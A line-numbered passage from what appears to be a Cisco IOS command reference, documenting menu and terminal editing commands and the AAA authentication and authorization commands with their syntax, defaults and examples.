6215connection name.
6216You can also use the resume/next command, which resumes the next connection in the user's
6217list of connections. This function allows you to create a single menu entry that steps through all of
6218the user's connections.
6219Refer to the Access Services Configuration Guide for more information on the menu command.
6220Example
6221The following example shows how to specify the commands to be executed when a user enters
6222the selection number associated with the menu entry for the menu named Access1:
6223menu Access1 command 1 tn3270 vms.cisco.com
6224menu Access1 command 2 rlogin unix.cisco.com
6225menu Access1 command 3 menu-exit
6226Related Commands
6227A dagger (†) indicates that the command is documented outside this chapter.
6228menu (global) â€
6229menu text
6230menu title
6231resume â€
6232
6233
6234[12.1.6] menu text
6235Use the menu text global configuration command to specify the text of a menu item in a user
6236interface menu.
6237menu name text number
6238Syntax Description
6239name The configuration name of the menu. You can specify a maximum of 20 characters.
6240number The selection number associated with the menu item. This number is displayed
6241to the left of the menu item. You can specify a maximum of 18 menu items. When the tenth item
6242is added to the menu, the line-mode and single-space options are activated automatically.
6243Command Mode
6244Global configuration
6245Usage Guidelines
6246This command first appeared in Cisco IOS Release 10.0.
6247The menu text command and the menu command define a menu item. These commands must
6248use the same menu name and menu selection number.
6249You can specify a maximum of 18 items in a menu.
6250Example
6251The following example shows how to specify the descriptive text for the three entries in the menu
6252Access1:
6253menu Access1 text 1 IBM Information Systems
6254menu Access1 text 2 UNIX Internet Access
6255menu Access1 text 3 Exit menu system
6256Related Commands
6257A dagger (†) indicates that the command is documented outside this chapter.
6258menu (global)
6259menu command
6260menu title
6261resume â€
6262
6263
6264[12.1.7] menu title
6265Use the menu title global configuration command to create a title, or banner, for a user menu.
6266menu name title delimiter
6267Syntax Description
6268name The configuration name of the menu. You can specify a maximum of 20 characters.
6269delimiter Characters that mark the beginning and end of a title. Text delimiters are
6270characters that do not ordinarily appear within the text of a title, such as slash ( / ), double quote
6271("), and tilde ( ~ ). Ctrl-C is reserved for special use and should not be used in the text of the title.
6272Command Mode
6273Global configuration
6274Usage Guidelines
6275This command first appeared in Cisco IOS Release 10.0.
6276The menu title command must use the same menu name used with the menu text and menu
6277command commands used to create a menu.
6278You can position the title of the menu horizontally by preceding the title text with blank characters.
6279You can also add lines of space above and below the title by pressing Return.
6280Follow the title keyword with one or more blank characters and a delimiting character of your
6281choice. Then enter one or more lines of text, ending the title with the same delimiting character.
6282You cannot use the delimiting character within the text of the message.
6283When you are configuring from a terminal and are attempting to include special control
6284characters, such as a screen-clearing string, you must use Ctrl-V before the special control
6285characters so that they are accepted as part of the title string. The string ^[[H^[[J is an escape
6286string used by many VT100-compatible terminals to clear the screen. To use a special string, you
6287must enter Ctrl-V before each escape character.
6288You also can use the clear-screen option of the menu command to clear the screen before
6289displaying menus and submenus, instead of embedding a terminal-specific string in the menu
6290title. The clear-screen option allows the same menu to be used on different types of terminals.
6291Example
6292The following example specifies the title that will be displayed when the menu Access1 is
6293invoked:
6294cs101(config)# menu Access1 title /^[[H^[[J
6295 Welcome to Access1 Internet Services
6296
6297 Type a number to select an option;
6298 Type 9 to exit the menu.
6299Related Commands
6300A dagger (†) indicates that the command is documented outside this chapter.
6301menu (global)
6302menu command
6303menu text
6304resume â€
6305
6306
6307[12.1.8] show history
6308To list the commands you have entered in the current EXEC session, use the show history
6309EXEC command.
6310show history
6311Syntax Description
6312This command has no arguments or keywords.
6313Command Mode
6314EXEC
6315Usage Guidelines
6316This command first appeared in Cisco IOS Release 10.0.
6317The command history feature provides a record of EXEC commands you have entered. The
6318number of commands that the history buffer will record is determined by the history size line
6319configuration command or the terminal history size EXEC command.
6320
6321Key Function
6322Ctrl-P or Up Arrow Recalls commands in the history buffer in a backward sequence,
6323beginning with the most recent command. Repeat the key sequence to recall successively older
6324commands.
6325Ctrl-N or Down Arrow Returns to more recent commands in the history buffer after recalling
6326commands with Ctrl-P or the Up Arrow. Repeat the key sequence to recall successively more
6327recent commands.
6328Sample Display
6329The following is sample output from the show history command, which lists the commands the
6330user has entered in EXEC mode for this session:
6331Router# show history
6332 help
6333 where
6334 show hosts
6335 show history
6336Router#
6337Related Commands
6338A dagger (†) indicates that the command is documented outside this chapter.
6339history size
6340terminal history sizeâ€
6341
6342
6343[12.1.9] terminal editing
6344To enable the enhanced editing mode on the local line, use the terminal editing EXEC
6345command. To disable the enhanced editing mode on the current line, use the no form of this
6346command.
6347terminal editing
6348terminal no editing
6349Syntax Description
6350This command has no arguments or keywords.
6351Default
6352Enabled
6353Command Mode
6354EXEC
6355Usage Guidelines
6356This command first appeared in Cisco IOS Release 10.0.
6357
6358Keys Function
6359Tab Completes a partial command name entry. When you enter a unique set of characters
6360and press the Tab key, the system completes the command name. If you enter a set of
6361characters that could indicate more than one command, the system beeps to indicate an error.
6362Enter a question mark (?) immediately following the partial command (no space). The system
6363provides a list of commands that begin with that string.
6364Delete or Backspace Erases the character to the left of the cursor.
6365Return At the command line, pressing the Return key performs the function of processing, or
6366carrying out, a command. At the " ---More--- " prompt on a terminal screen, pressing the Return
6367key scrolls down a line.
6368Space Bar Scrolls down a page on the terminal screen. Press the space bar when you see
6369the line
6370" ---More--- " on the screen to display the next screen.
6371Left arrow Moves the cursor one character to the left. When you enter a command that extends
6372beyond a single line, you can continue to press the left arrow key at any time to scroll back
6373toward the system prompt and verify the beginning of the command entry.
6374Right arrow1 Moves the cursor one character to the right.
6375Up arrow1 or Ctrl-P Recalls commands in the history buffer, beginning with the most recent
6376command. Repeat the key sequence to recall successively older commands.
6377Down arrow1 or
6378Ctrl-N Return to more recent commands in the history buffer after recalling commands with the
6379Up arrow or Ctrl-P. Repeat the key sequence to recall successively more recent commands.
6380Ctrl-A Moves the cursor to the beginning of the line.
6381Ctrl-B Moves the cursor back one character.
6382Ctrl-D Deletes the character at the cursor.
6383Ctrl-E Moves the cursor to the end of the command line.
6384Ctrl-F Moves the cursor forward one character.
6385Ctrl-K Deletes all characters from the cursor to the end of the command line.
6386Ctrl-L and Ctrl-R Redisplays the system prompt and command line.
6387Ctrl-T Transposes the character to the left of the cursor with the character located at the cursor.
6388
6389Ctrl-U and Ctrl-X Deletes all characters from the cursor back to the beginning of the
6390command line.
6391Ctrl-V and Esc Q Inserts a code to indicate to the system that the key stroke immediately
6392following should be treated as a command entry, not as an editing key.
6393Ctrl-W Deletes the word to the left of the cursor.
6394Ctrl-Y Recalls the most recent entry in the delete buffer. The delete buffer contains the last ten
6395items you have deleted or cut. Ctrl-Y can be used in conjunction with Esc Y.
6396Ctrl-Z Ends configuration mode and returns you to the EXEC prompt.
6397Esc B Moves the cursor back one word.
6398Esc C Capitalizes the word at the cursor.
6399Esc D Deletes from the cursor to the end of the word.
6400Esc F Moves the cursor forward one word.
6401Esc L Changes the word at the cursor to lowercase.
6402Esc U Capitalizes from the cursor to the end of the word.
6403Esc Y Recalls the next buffer entry. The buffer contains the last ten items you have deleted.
6404Press Ctrl-Y first to recall the most recent entry. Then press Esc Y up to nine times to recall the
6405remaining entries in the buffer. If you bypass an entry, continue to press Esc Y to cycle back to it.
6406
6407
6408Key Function
6409Delete or Backspace Erases the character to the left of the cursor.
6410Ctrl-W Erases a word.
6411Ctrl-U Erases a line.
6412Ctrl-R Redisplays a line.
6413Ctrl-Z Ends configuration mode and returns to the EXEC prompt.
6414Return Executes single-line commands.
6415Example
6416In the following example, enhanced mode editing is reenabled for the current terminal session:
6417terminal editing
6418Related Command
6419editing
6420
6421[12.2.0] terminal full-help (EXEC)
6422To get help for the full set of user-level commands, use the terminal full-help EXEC command.
6423terminal full-help
6424Syntax Description
6425This command has no arguments or keywords.
6426Default
6427Disabled
6428Command Mode
6429EXEC
6430Usage Guidelines
6431This command first appeared in Cisco IOS Release 10.0.
6432The terminal full-help command enables (or disables) a user to see all of the help messages
6433available from the terminal. It is used with the show ? command.
6434Example
6435The following example is output for show ? with terminal full-help enabled:
6436Router> terminal full-help
6437Router> show ?
6438
6439access-lists List access lists
6440appletalk AppleTalk information
6441arap Show Appletalk Remote Access statistics
6442arp ARP table
6443async Information on terminal lines used as router interfaces...
6444Related Commands
6445full-help
6446help
6447
6448[12.2.1] terminal history
6449To enable the command history feature for the current terminal session or change the size of the
6450command history buffer for the current terminal session, use the terminal history EXEC
6451command. To disable the command history feature or reset the command history buffer to its
6452default size, use the no form of this command.
6453terminal history [size number-of-lines]
6454terminal no history [size]
6455Syntax Description
6456size (Optional) Sets command history buffer size.
6457number-of-lines (Optional) Specifies the number of command lines that the system will
6458record in its history buffer. The range is 0 to 256.
6459Default
646010 lines
6461Command Mode
6462EXEC
6463Usage Guidelines
6464This command first appeared in Cisco IOS Release 10.0.
6465The history command without the size keyword and argument enables the command history
6466feature with the last buffer size specified or the default size. The no history command without the
6467size keyword disables the command history feature. The no history size command resets the
6468buffer size to the default of 10 command lines.
6469The history command provides a record of EXEC commands you have entered. This feature is
6470particularly useful to recall long or complex commands or entries, including access lists.
6471
6472Key Function
6473Ctrl-P or up arrow Recalls commands in the history buffer in a backward sequence, beginning
6474with the most recent command. Repeat the key sequence to recall successively older commands.
6475
6476Ctrl-N or down arrow1 Returns to more recent commands in the history buffer after recalling
6477commands with Ctrl-P or the up arrow. Repeat the key sequence to recall successively more
6478recent commands.
6479
64801 The arrow keys function only with ANSI-compatible terminals such as VT100s.
6481Example
6482In the following example, the number of command lines recorded is set to 15 for the local line:
6483terminal history size 15
6484Related Commands
6485history
6486show history
6487
6488[12.2.2] Network Access Security Commands
6489This chapter describes the commands used to manage security on the network.
6490
6491[12.2.3] aaa authentication arap
6492To enable an Authentication Authorization and Accounting (AAA) authentication method for
6493AppleTalk Remote Access (ARA) users using TACACS+, use the aaa authentication arap
6494global configuration command. Use the no form of this command to disable this authentication.
6495aaa authentication arap {default | list-name} method1 [...[method4]]
6496no aaa authentication arap {default | list-name} method1 [...[method4]]
6497Syntax Description
6498default Uses the listed methods that follow this argument as the default list of methods when a
6499user logs in.
6500list-name Character string used to name the following list of authentication methods tried
6501when a user logs in.
6502method One of the keywords described in Table 1.
6503Default
6504If the default list is not set, only the local user database is checked. This version has the same
6505effect as the following command:
6506aaa authentication arap default local
6507Command Mode
6508Global configuration
6509Usage Guidelines
6510This command first appeared in Cisco IOS Release 10.3.
6511The list names and default that you set with the aaa authentication arap command are used
6512with the arap authentication command. These lists can contain up to four authentication
6513methods that are used when a user tries to log in with ARA. Note that ARAP guest logins are
6514disabled by default when you enable AAA/TACACS+. To allow guest logins, you must use either
6515the guest or auth-guest method listed in Table 1. You can only use one of these methods; they
6516are mutually exclusive.
6517Create a list by entering the aaa authentication arap list-name method command, where list-
6518name is any character string used to name this list (such as MIS-access.) The method argument
6519identifies the list of methods the authentication algorithm tries in the given sequence. You can
6520enter up to four methods.
6521
6522Use the show running-config command to view lists of authentication methods.
6523Table 1 AAA Authentication ARAP Methods
6524Keyword Description
6525guest Allows guest logins. This method must be the first method listed, but it can be followed by
6526other methods if it does not succeed.
6527auth-guest Allows guest logins only if the user has already logged in to EXEC. This method
6528must be the first method listed, but can be followed by other methods if it does not succeed.
6529line Uses the line password for authentication.
6530local Uses the local username database for authentication.
6531tacacs+ Uses TACACS+ authentication.
6532radius Uses RADIUS authentication.
6533
6534Note This command cannot be used with TACACS or extended TACACS.
6535
6536Examples
6537The following example creates a list called MIS-access, which first tries TACACS+ authentication
6538and then none:
6539aaa authentication arap MIS-access tacacs+ none
6540The following example creates the same list, but sets it as the default list that is used for all ARA
6541protocol authentications if no other list is specified:
6542aaa authentication arap default tacacs+ none
6543Related Commands
6544aaa authentication local-override
6545aaa new-model
6546aaa new-model
6547
6548[12.2.4] aaa authentication enable default
6549To enable AAA authentication to determine if a user can access the privileged command level,
6550use the aaa authentication enable default global configuration command. Use the no form of
6551this command to disable this authorization method.
6552aaa authentication enable default method1 [...[method4]]
6553no aaa authentication enable default method1 [...[method4]]
6554Syntax Description
6555method At least one and up to four of the keywords described in Table 2.
6556Default
6557If the default list is not set, only the enable password is checked. This version has the same
6558effect as the following command:
6559aaa authentication enable default enable
6560On the console, the enable password is used if it exists. If no password is set, the process will
6561succeed anyway.
6562Command Mode
6563Global configuration
6564Usage Guidelines
6565This command first appeared in Cisco IOS Release 10.3.
6566Use the aaa authentication enable default command to create a series of authentication
6567methods that are used to determine whether a user can access the privileged command level.
6568You can specify up to four authentication methods. Method keywords are described in Table 2.
6569The additional methods of authentication are used only if the previous method returns an error,
6570not if it fails. To specify that the authentication should succeed even if all methods return an error,
6571specify none as the final method in the command line.
6572If a default authentication routine is not set for a function, the default is none and no
6573authentication is performed. Use the show running-config command to view currently
6574configured lists of authentication methods.
6575Table 2 AAA Authentication Enable Default Methods
6576Keyword Description
6577enable Uses the enable password for authentication.
6578line Uses the line password for authentication.
6579none Uses no authentication.
6580tacacs+ Uses TACACS+ authentication.
6581radius Uses RADIUS authentication.
6582
6583Note This command cannot be used with TACACS or extended TACACS.
6584
6585Example
6586The following example creates an authentication list that first tries to contact a TACACS+ server.
6587If no server can be found, AAA tries to use the enable password. If this attempt also returns an
6588error (because no enable password is configured on the server), the user is allowed access with
6589no authentication.
6590aaa authentication enable default tacacs+ enable none
6591Related Commands
6592A dagger (†) indicates that the command is documented outside this chapter.
6593aaa authentication local-override
6594aaa authorization
6595aaa new-model
6596enable password â€
6597
6598
6599[12.2.5] aaa authentication local-override
6600To configure the Cisco IOS software to check the local user database for authentication before
6601attempting another form of authentication, use the aaa authentication local-override global
6602configuration command. Use the no form of this command to disable the override.
6603aaa authentication local-override
6604no aaa authentication local-override
6605Syntax Description
6606This command has no arguments or keywords.
6607Default
6608Override is disabled.
6609Command Mode
6610Global configuration
6611Usage Guidelines
6612This command first appeared in Cisco IOS Release 10.3.
6613This command is useful when you want to configure an override to the normal authentication
6614process for certain personnel such as system administrators.
6615When this override is set, the user is always prompted for the username. The system then checks
6616to see if the entered username corresponds to a local account. If the username does not
6617correspond to one in the local database, login proceeds with the methods configured with other
6618aaa commands (such as aaa authentication login). Note that when using this command
6619Username: is fixed as the first prompt.
6620Example
6621The following example enables AAA authentication override:
6622aaa authentication local-override
6623Related Commands
6624aaa authentication arap
6625aaa authentication enable default
6626aaa authentication login
6627aaa authentication ppp
6628aaa new-model
6629
6630[12.2.6] aaa authentication login
6631To set AAA authentication at login, use the aaa authentication login global configuration
6632command. Use the no form of this command to disable AAA authentication.
6633aaa authentication login {default | list-name} method1 [...[method4]]
6634no aaa authentication login {default | list-name} method1 [...[method4]]
6635Syntax Description
6636default Uses the listed authentication methods that follow this argument as the default list of
6637methods when a user logs in.
6638list-name Character string used to name the following list of authentication methods
6639activated when a user logs in.
6640method At least one and up to four of the keywords described in Table 3.
6641Default
6642If the default list is not set, only the local user database is checked. This version has the same
6643effect as the following command:
6644aaa authentication login default local
6645
6646Note On the console, login will succeed without any authentication checks if default is not set.
6647
6648Command Mode
6649Global configuration
6650Usage Guidelines
6651This command first appeared in Cisco IOS Release 10.3.
6652The default and optional list names that you create with the aaa authentication login command
6653are used with the login authentication command.
6654Create a list by entering the aaa authentication list-name method command for a particular
6655protocol, where list-name is any character string used to name this list (such as MIS-access). The
6656method argument identifies the list of methods that the authentication algorithm tries, in the given
6657sequence. Method keywords are described in Table 3.
6658To create a default list that is used if no list is assigned to a line, use the login authentication
6659command with the default argument followed by the methods you want to use in default
6660situations.
6661The additional methods of authentication are used only if the previous method returns an error,
6662not if it fails. To ensure that the authentication succeeds even if all methods return an error,
6663specify none as the final method in the command line.
6664If authentication is not specifically set for a line, the default is to deny access and no
6665authentication is performed. Use the show running-config command to display currently
6666configured lists of authentication methods.
6667Table 3 AAA Authentication Login Methods
6668Keyword Description
6669enable Uses the enable password for authentication.
6670krb5 Uses Kerberos 5 for authentication.
6671line Uses the line password for authentication.
6672local Uses the local username database for authentication.
6673none Uses no authentication.
6674radius Uses RADIUS authentication.
6675tacacs+ Uses TACACS+ authentication.
6676krb5-telnet Uses Kerberos 5 Telnet authentication protocol when using Telnet to connect to
6677the router.
6678
6679Note This command cannot be used with TACACS or extended TACACS.
6680
6681Examples
6682The following example creates an AAA authentication list called MIS-access. This authentication
6683first tries to contact a TACACS+ server. If no server is found, TACACS+ returns an error and AAA
6684tries to use the enable password. If this attempt also returns an error (because no enable
6685password is configured on the server), the user is allowed access with no authentication.
6686aaa authentication login MIS-access tacacs+ enable none
6687The following example creates the same list, but it sets it as the default list that is used for all
6688login authentications if no other list is specified:
6689aaa authentication login default tacacs+ enable none
6690The following example sets authentication at login to use the Kerberos 5 Telnet authentication
6691protocol when using Telnet to connect to the router:
6692aaa authentication login default KRB5-TELNET krb5
6693Related Commands
6694A dagger (†) indicates that this command is documented outside this chapter.
6695aaa authentication local-override
6696aaa new-model
6697login authentication â€
6698
6699
6700[12.2.7] aaa authentication nasi
6701To specify AAA authentication for Netware Asynchronous Services Interface (NASI) clients
6702connecting through the access server, use the aaa authentication nasi global configuration
6703command. Use the no form of this command to disable authentication for NASI clients.
6704aaa authentication nasi {default | list-name} method1 [...[method4]]
6705no aaa authentication nasi{default | list-name} method1 [...[method4]]
6706Syntax Description
6707default Makes the listed authentication methods that follow this argument the default list of
6708methods used when a user logs in.
6709list-name
6710 Character string used to name the following list of authentication methods activated when
6711a user logs in.
6712methods At least one and up to four of the methods described in Table 4.
6713Default
6714If the default list is not set, only the local user database is selected. This setting has the same
6715effect as the following command:
6716aaa authentication nasi default local
6717Command Mode
6718Global configuration
6719Usage Guidelines
6720This command first appeared in Cisco IOS Release 11.1.
6721The default and optional list names that you create with the aaa authentication nasi command
6722are used with the nasi authentication command.
6723Create a list by entering the aaa authentication nasi command, where list-name is any character
6724string that names this list (such as MIS-access). The method argument identifies the list of
6725methods the authentication algorithm tries in the given sequence.
6726
6727To create a default list that is used if no list is assigned to a line with the nasi authentication
6728command, use the default argument followed by the methods that you want to use in default
6729situations.
6730The remaining methods of authentication are used only if the previous method returns an error,
6731not if it fails. To ensure that the authentication succeeds even if all methods return an error,
6732specify none as the final method in the command line.
6733If authentication is not specifically set for a line, the default is to deny access and no
6734authentication is performed. Use the show running-config command to displays currently
6735configured lists of authentication methods.
6736Table 4 AAA Authentication NASI Methods
6737Keyword Description
6738enable Uses the enable password for authentication.
6739line Uses the line password for authentication.
6740local Uses the local username database for authentication.
6741none Uses no authentication.
6742tacacs+ Uses TACACS+ authentication.
6743
6744Note This command cannot be used with TACACS or extended TACACS.
6745
6746Examples
6747The following example creates an AAA authentication list called list1. This authentication first tries
6748to contact a TACACS+ server. If no server is found, TACACS+ returns an error and AAA tries to
6749use the enable password. If this attempt also returns an error (because no enable password is
6750configured on the server), the user is allowed access with no authentication.
6751aaa authentication nasi list1 tacacs+ enable none
6752The following example creates the same list, but sets it as the default list that is used for all login
6753authentications if no other list is specified:
6754aaa authentication nasi default tacacs+ enable none
6755Related Commands
6756A dagger (†) indicates that the command is documented outside this chapter.
6757ipx nasi-server enable â€
6758nasi authentication
6759show ipx nasi connections â€
6760show ipx spx-protocol â€
6761
6762
6763[12.2.8] aaa authentication password-prompt
6764To change the text displayed when users are prompted for a password, use the aaa
6765authentication password-prompt global configuration command. Use the no form of this
6766command to return to the default password prompt text.
6767aaa authentication password-prompt {text-string}
6768no aaa authentication password-prompt {text-string}
6769Syntax Description
6770text-string String of text that will be displayed when the user is prompted to enter a
6771password. If this text-string contains spaces or unusual characters, it must be enclosed in double-
6772quotes (for example, "Enter your password:").
6773Default
6774This command is disabled by default.
6775Command Mode
6776Global configuration
6777Usage Guidelines
6778This command first appeared in Cisco IOS Release 11.0.
6779Use the aaa authentication password-prompt command to change the default text that the
6780Cisco IOS software displays when prompting a user to enter a password. This command changes
6781the password prompt for the enable password as well as for login passwords that are not supplied
6782by remote security servers. The no form of this command returns the password prompt to the
6783default value:
6784Password:
6785The aaa authentication password-prompt command does not change any dialog that is
6786supplied by a remote TACACS+ or RADIUS server.
6787Example
6788The following example changes the text for the password prompt:
6789aaa authentication password-prompt "Enter your password now:"
6790Related Commands
6791A dagger (†) indicates that the command is documented outside this chapter.
6792aaa authentication username prompt
6793aaa new-model
6794enable password â€
6795
6796
6797[12.2.9] aaa authentication ppp
6798To specify one or more AAA authentication methods for use on serial interfaces running Point-to-
6799Point (PPP) and TACACS+, use the aaa authentication ppp global configuration command. Use
6800the no form of this command to disable authentication.
6801aaa authentication ppp {default | list-name} method1 [...[method4]]
6802no aaa authentication ppp {default | list-name} method1 [...[method4]]
6803Syntax Description
6804default Uses the listed authentication methods that follow this argument as the default list of
6805methods when a user logs in.
6806list-name Character string used to name the following list of authentication methods tried
6807when a user logs in.
6808method
6809
6810Default
6811If the default list is not set, only the local user database is checked. This command has the same
6812effect as the following command:
6813aaa authentication ppp default local
6814Command Mode
6815Global configuration
6816Usage Guidelines
6817This command first appeared in Cisco IOS Release 10.3.
6818The lists that you create with the aaa authentication ppp command are used with the ppp
6819authentication command. These lists contain up to four authentication methods that are used
6820when a user tries to log in to the serial interface.
6821Create a list by entering the aaa authentication ppp list-name method command, where list-
6822name is any character string used to name this list (such as MIS-access). The method argument
6823identifies the list of methods that the authentication algorithm tries in the given sequence. You
6824can enter up to four methods. Method keywords are described in Table 5.
6825The additional methods of authentication are only used if the previous method returns an error,
6826not if it fails. Specify none as the final method in the command line to have authentication
6827succeed even if all methods return an error.
6828If authentication is not specifically set for a function, the default is none and no authentication is
6829performed. Use the show running-config command to display lists of authentication methods.
6830Table 5 AAA Authentication PPP Methods
6831Keyword Description
6832if-needed Does not authenticate if user has already been authenticated on a TTY line.
6833krb5 Uses Kerberos 5 for authentication (can only be used for PAP authentication).
6834local Uses the local username database for authentication.
6835none Uses no authentication.
6836radius Uses RADIUS authentication.
6837tacacs+ Uses TACACS+ authentication.
6838
6839Note This command cannot be used with TACACS or extended TACACS.
6840
6841Example
6842The following example creates an AAA authentication list called MIS-access for serial lines that
6843use PPP. This authentication first tries to contact a TACACS+ server. If this action returns an
6844error, the user is allowed access with no authentication.
6845aaa authentication MIS-access ppp tacacs+ none
6846Related Commands
6847A dagger (†) indicates that this command is documented outside this chapter.
6848aaa authentication local-override
6849aaa new-model
6850ppp authentication
6851
6852[12.3.0] aaa authentication username-prompt
6853To change the text displayed when users are prompted to enter a username, use the aaa
6854authentication username-prompt global configuration command. Use the no form of this
6855command to return to the default username prompt text.
6856aaa authentication username-prompt {text-string}
6857no aaa authentication username-prompt {text-string}
6858Syntax Description
6859text-string String of text that will be displayed when the user is prompted to enter a
6860username. If this text-string contains spaces or unusual characters, it must be enclosed in
6861double-quotes (for example, "Enter your name:").
6862Default
6863This command is disabled by default.
6864Command Mode
6865Global configuration
6866Usage Guidelines
6867This command first appeared in Cisco IOS Release 11.0.
6868Use the aaa authentication username-prompt command to change the default text that the
6869Cisco IOS software displays when prompting a user to enter a username. The no form of this
6870command returns the username prompt to the default value:
6871Username:
6872Some protocols (for example, TACACS+) have the ability to override the use of local username
6873prompt information. Using the aaa authentication username-prompt command will not change
6874the username prompt text in these instances.
6875
6876Note The aaa authentication username-prompt command does not change any dialog that is
6877supplied by a remote TACACS+ server.
6878
6879Example
6880The following example changes the text for the username prompt:
6881aaa authentication username-prompt "Enter your name here:"
6882Related Commands
6883A dagger (†) indicates that the command is documented outside this chapter.
6884aaa authentication password-prompt
6885aaa new-model
6886enable password â€
6887
6888
6889[12.3.1] aaa authorization
6890Use the aaa authorization global configuration command to set parameters that restrict a user's
6891network access. Use the no form of this command to disable authorization for a function.
6892aaa authorization {network | exec | command level} method
6893no aaa authorization {network | exec | command level}
6894Syntax Description
6895network Runs authorization for all network-related service requests, including SLIP, PPP,
6896PPP NCPs, and ARA protocol.
6897exec Runs authorization to determine if the user is allowed to run an EXEC shell. This facility
6898might return user profile information such as autocommand information.
6899command Runs authorization for all commands at the specified privilege level.
6900level Specific command level that should be authorized. Valid entries are 0 through 15.
6901method One of the keywords in Table 6.
6902Default
6903Authorization is disabled for all actions (equivalent to the keyword none).
6904Command Mode
6905Global configuration
6906Usage Guidelines
6907This command first appeared in Cisco IOS Release 10.0.
6908
6909Note There are five commands associated with privilege level 0: disable, enable, exit, help, and
6910logout. If you configure AAA authorization for a privilege level greater than 0, these five
6911commands will not be included in the privilege level command set.
6912
6913Use the aaa authorization command to create at least one, and up to four, authorization
6914methods that can be used when a user accesses the specified function.
6915
6916Note This command, along with aaa accounting, replaces the tacacs-server suite of commands
6917in previous versions of TACACS.
6918
6919The additional methods of authorization are used only if the previous method returns an error, not
6920if it fails. Specify none as the final method in the command line to have authorization succeed
6921even if all methods return an error.
6922If authorization is not specifically set for a function, the default is none and no authorization is
6923performed.
6924Table 6 AAA Authorization Methods
6925Keyword Description
6926tacacs+ Requests authorization information from the TACACS+ server.
6927if-authenticated Allows the user to access the requested function if the user is
6928authenticated.
6929none No authorization is performed.
6930local Uses the local database for authorization.
6931radius Uses RADIUS to get authorization information.
6932krb5-instance Uses the instance defined by the Kerberos instance map command.
6933The authorization command causes a request packet containing a series of attribute value pairs
6934to be sent to the TACACS daemon as part of the authorization process. The daemon can do one
6935of the following:
6936? Accept the request as is
6937? Make changes to the request
6938? Refuse the request, and hence, refuse authorization
6939Table 7 describes attribute value (AV) pairs associated with the aaa authorization command.
6940Registered users can find more information about TACACS+ and attribute pairs on Cisco
6941Connection Online (CCO).
6942
6943Attribute Description Cisco IOS Release
694411.0 Cisco IOS Release11.1 Cisco IOS Release11.2
6945service=x The primary service. Specifying a service attribute indicates that this is a request
6946for authorization or accounting of that service. Current values are slip, ppp, arap, shell, tty-
6947daemon, connection, and system. This attribute must always be included. yes yes
6948 yes
6949protocol=x A protocol that is a subset of a service. An example would be any PPP NCP.
6950Currently known values are lcp, ip, ipx, atalk, vines, lat, xremote, tn3270, telnet, rlogin, pad,
6951vpdn, http, and unknown. yes yes yes
6952cmd=x A shell (EXEC) command. This indicates the command name for a shell command that is
6953to be run. This attribute must be specified if service equals "shell." A NULL value indicates that
6954the shell itself is being referred to. yes yes yes
6955cmd-arg=x An argument to a shell (EXEC) command. This indicates an argument for the
6956shell command that is to be run. Multiple cmd-arg attributes may be specified, and they are order
6957dependent. yes yes yes
6958acl=x ASCII number representing a connection access list. Used only when service=shell.
6959 yes yes yes
6960inacl=x ASCII identifier for an interface input access list. Used with service=ppp and protocol=ip.
6961 yes yes yes
6962inacl#<n> ASCII access list identifier for an input access list to be installed and applied to
6963an interface for the duration of the current connect ion. Used with service=ppp and protocol=ip,
6964and service service=ppp and protocol =ipx. no no 11.2(4)F
6965outacl=x ASCII identifier for an interface output access list. Used with service=ppp and
6966protocol=ip, and service service=ppp and protocol=ipx. Contains an IP output access list for SLIP
6967or PPP/IP (for example, outacl=4). The access list itself must be preconfigured on the router. Per-
6968user access lists do not currently work with ISDN interfaces. yes (PPP/IP only) yes
6969 yes
6970outacl#<n> ACSII access list identifier for an interface output access list to be installed and
6971applied to an interface for the duration of the current condition. Used with service=ppp and
6972protocol=ip, and service service=ppp and protocol=ipx. no no 11.2(4)F
6973zonelist=x A numeric zonelist value. Used with service=arap. Specifies an AppleTalk
6974zonelist for ARA (for example, zonelist=5). yes yes yes
6975addr=x A network address. Used with service=slip, service=ppp, and protocol=ip. Contains the IP
6976address that the remote host should use when connecting via SLIP or PPP/IP. For example,
6977addr=1.2.3.4. yes yes yes
6978addr-pool=x Specifies the name of a local pool from which to get the address of the remote
6979host. Used with service=ppp and protocol=ip.
6980Note that addr-pool works in conjunction with local pooling. It specifies the name of a local pool
6981(which must be preconfigured on the network access server). Use the ip-local pool command to
6982declare local pools. For example:
6983ip address-pool local
6984ip local pool boo 1.0.0.1 1.0.0.10
6985ip local pool moo 2.0.0.1 2.0.0.20
6986You can then use TACACS+ to return addr-pool=boo or addr-pool=moo to indicate the address
6987pool from which you want to get this remote node's address. yes yes yes
6988routing=x Specifies whether routing information is to be propagated to, and accepted from
6989this interface. Used with service=slip, service=ppp, and protocol=ip. Equivalent in function to the
6990/routing flag in SLIP and PPP commands. Can either be true or false (for example, routing=true).
6991 yes yes yes
6992route Specifies a route to be applied to an interface. Used with service=slip, service=ppp, and
6993protocol=ip.
6994During network authorization, the route attribute can be used to specify a per-user static route, to
6995be installed by TACACS+ as follows:
6996route=" dst_address mask [ gateway ]"
6997This indicates a temporary static route that is to be applied. dst_address, mask, and gateway are
6998expected to be in the usual dotted-decimal notation, with the same meanings as in the familiar ip
6999route configuration command on a network access server.
7000If gateway is omitted, the peer's address is the gateway. The route is expunged when the
7001connection terminates. no yes yes
7002route#<n> Like the route AV pair, this specifies a route to be applied to an interface, but
7003these routes are numbered, allowing multiple routes to be applied. Used with service=ppp and
7004protocol=ip, and service=ppp and protocol=ipx. no no 11.2(4)F
7005timeout=x The number of minutes before an ARA session disconnects (for example,
7006timeout=60). A value of zero indicates no timeout. Used with service=arap. yes yes
7007 yes
7008idletime=x Sets a value, in minutes, after which an idle session is terminated. Does not work
7009for PPP. A value of zero indicates no timeout. no yes yes
7010autocmd=x Specifies an autocommand to be executed at EXEC startup (for example,
7011autocmd=telnet muruga.com). Used only with service=shell. yes yes yes
7012noescape=x Prevents user from using an escape character. Used with service=shell. Can be
7013either true or false (for example, noescape=true). yes yes yes
7014nohangup=x Used with service=shell. Specifies the nohangup option. Can be either true or
7015false (for example, nohangup=false). yes yes yes
7016priv-lvl=x Privilege level to be assigned for the EXEC. Used with service=shell. Privilege
7017levels range from 0 to 15, with 15 being the highest. yes yes yes
7018callback-dialstring Sets the telephone number for a callback (for example: callback-
7019dialstring=408-555-1212). Value is NULL, or a dial-string. A NULL value indicates that the service
7020may choose to get the dialstring through other means. Used with service=arap, service=slip,
7021service=ppp, service=shell. Not valid for ISDN. no yes yes
7022callback-line The number of a TTY line to use for callback (for example: callback-line=4). Used
7023with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. no yes
7024 yes
7025callback-rotary The number of a rotary group (between 0 and 100 inclusive) to use for callback
